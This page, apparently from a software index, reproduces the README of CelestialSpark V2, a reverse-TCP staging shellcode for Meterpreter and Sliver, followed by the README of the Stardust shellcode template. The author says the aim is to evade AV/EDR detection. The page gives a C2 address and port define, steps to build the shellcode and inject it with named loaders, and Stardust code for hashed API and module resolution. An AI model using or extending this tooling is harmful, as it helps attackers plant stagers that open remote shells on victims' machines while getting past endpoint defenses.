Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/karkas66/celestialspark

Version 2 - A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust
https://github.com/karkas66/celestialspark

pe position-in shellcode stager

Last synced: 12 months ago
JSON representation

Version 2 - A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust

Awesome Lists containing this project

README 

          
# CelestialSpark V2



A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust Version 2 (03/2025)



```c++

#include 

#include 

#include 



using namespace stardust;



// Define IP adress of your C2 Stager

#define IP_STR  "10.10.10.10"

// Define PORT 443 of your C2 Stager

#define PORT 443

```



## Why

I wanted to improve my understanding of position independent Shellcode, plus... My Meterpreter reverse_TCP Stager gets caught by a lot of AV/EDRs and I was hoping to somehow get around the IoCs the 15 year old Meterpreter reverse_TCP Shellcode generated by msfvenom.

Inspirations were:

- https://github.com/SherifEldeeb/TinyMet

- https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm



## How does it work

- not existing HTONS and HTONL functions have been hardcoded

- custom inet_addr function was rewritten and implemented in main.cc

- Socket creation and interaction functions have been imported from ws2_32.dll

- Meterpreter Staging Logic hase been copied from the original project and TinyMet



## Usage

- Git clone

- change IP and Port in main.cc

- disable the messagebox right before the Stage2 shellcode execution (if it bothers you)

- make

- Use your favourite Shellcode Loader/Injector. I Successfully tested:

    - https://github.com/Cipher7/ChaiLdr

    - https://github.com/florylsk/ExecIT

    - https://github.com/3xpl01tc0d3r/ProcessInjection

    - the original Stardust Loader and Stomper written by [Cracked5pider](https://github.com/Cracked5pider)



End of CelestialSpark

# Original Readme from here



# Stardust



A modern and easy to use 32/64-bit shellcode template.



- raw strings 

- C++20 project 

- uses compile time hashing with fnv1a for both function and module resolving  



### Basic Usage



resolving modules from PEB using `resolve::module`:

```c++

if ( ! (( ntdll.handle = resolve::module( expr::hash_string( L"ntdll.dll" ) ) )) ) {

    return;

}



if ( ! (( kernel32.handle = resolve::module( expr::hash_string( L"kernel32.dll" ) ) )) ) {

    return;

}

```



resolving function apis using either `RESOLVE_API` macro or `resolve::api` function:

```c++

const auto user32 = kernel32.LoadLibraryA( symbol( "user32.dll" ) );



decltype( MessageBoxA ) * msgbox = RESOLVE_API( reinterpret_cast( user32 ), MessageBoxA );



msgbox( nullptr, symbol( "Hello world" ), symbol( "caption" ), MB_OK );

```

The `RESOLVE_API` is a wrapper around `resolve::api` to automatically hashes the function name and cast the function pointer to the function type.



string hashing for both UTF-8 and UTF-16 using the compile time `expr::hash_string` function:

```c++

auto user32_hash      = expr::hash_string( L"user32.dll" );

auto loadlibrary_hash = expr::hash_string( "LoadLibraryA" );

```



raw strings support for both 32/64-bit by using the `symbol` function: 

```c++

auto caption_string = symbol( "hello from stardust" );



user32.MessageBoxA( nullptr, caption_string, symbol( "message title" ), MB_OK );

```



easy to add new apis and modules to the instance. Under `include/common.h` the following entry has to be made:

```c++

class instance {

    ...

    

    struct

    {

        uintptr_t handle; // base address to user32.dll



        struct {

            D_API( MessageBoxA );

            // more entries can be added here

        };

    } user32 = {

        RESOLVE_TYPE( MessageBoxA ),

        // more entries can be added here 

    };

    

    ...

```

while the ``src/main.cc`` should resolve the base address of user32 and resolve the api pointer:

```c++



declfn instance::instance(

    void

) {

    ...

    //

    // resolve user32.dll from PEB if loaded 

    if ( ! (( user32.handle = resolve::module( expr::hash_string( L"user32.dll" ) ) )) ) {

        return;

    }



    //

    // automatically resolve every entry imported

    // by user32 from the structure 

    RESOLVE_IMPORT( user32 );

    ...

}



```



semi friendly debugging capabilities via DbgPrint. The project althought needs to be compiled in debug mode by specifying ``make debug``. Usage: 

```c++

const auto user32 = kernel32.LoadLibraryA( symbol( "user32.dll" ) );



if ( user32 ) {

    DBG_PRINTF( "oh wow look we loaded user32.dll -> %p\n", user32 );

} else {

    DBG_PRINTF( "okay something went wrong. failed to load user32 :/\n" );

}



DBG_PRINTF( "running from %ls (Pid: %d)\n",

    NtCurrentPeb()->ProcessParameters->ImagePathName.Buffer,

    NtCurrentTeb()->ClientId.UniqueProcess );



DBG_PRINTF( "shellcode @ %p [%d bytes]\n", base.address, base.length );

```



### Building 



Build in release mode: 

```shell

$ make                                                                                                                                                                                                                                                                                  20:17:26

-> compiling src/main.cc to main.x64.obj

-> compiling src/resolve.cc to resolve.x64.obj

compiling x64 project

/usr/bin/x86_64-w64-mingw32-ld: bin/stardust.x64.exe:.text: section below image base

-> compiling src/main.cc to main.x86.obj

-> compiling src/resolve.cc to resolve.x86.obj

compiling x86 project

/usr/bin/i686-w64-mingw32-ld: bin/stardust.x86.exe:.text: section below image base

$ ll bin                                                                                                                                                                                                                                                                                20:57:10

drwxr-xr-x spider spider 4.0 KB Thu Mar 13 20:57:10 2025 obj

.rw-r--r-- spider spider 752 B  Thu Mar 13 20:57:10 2025 stardust.x64.bin

.rw-r--r-- spider spider 672 B  Thu Mar 13 20:57:10 2025 stardust.x86.bin

```



Build in debug mode: 

```shell

$ make debug                                                                                                                                                                                                                                                                            20:57:14

-> compiling src/main.cc to main.x64.obj

-> compiling src/resolve.cc to resolve.x64.obj

compiling x64 project

/usr/bin/x86_64-w64-mingw32-ld: bin/stardust.x64.exe:.text: section below image base

-> compiling src/main.cc to main.x86.obj

-> compiling src/resolve.cc to resolve.x86.obj

compiling x86 project

/usr/bin/i686-w64-mingw32-ld: bin/stardust.x86.exe:.text: section below image base

$ ll bin                                                                                                                                                                                                                                                                                20:58:13

drwxr-xr-x spider spider 4.0 KB Thu Mar 13 20:58:13 2025 obj

.rw-r--r-- spider spider 1.2 KB Thu Mar 13 20:58:13 2025 stardust.x64.bin

.rw-r--r-- spider spider 1.1 KB Thu Mar 13 20:58:13 2025 stardust.x86.bin

```



## Demo

x64:

![x64](./static/stomper.x64.png)



x86:

![x86](./static/stomper.x86.png)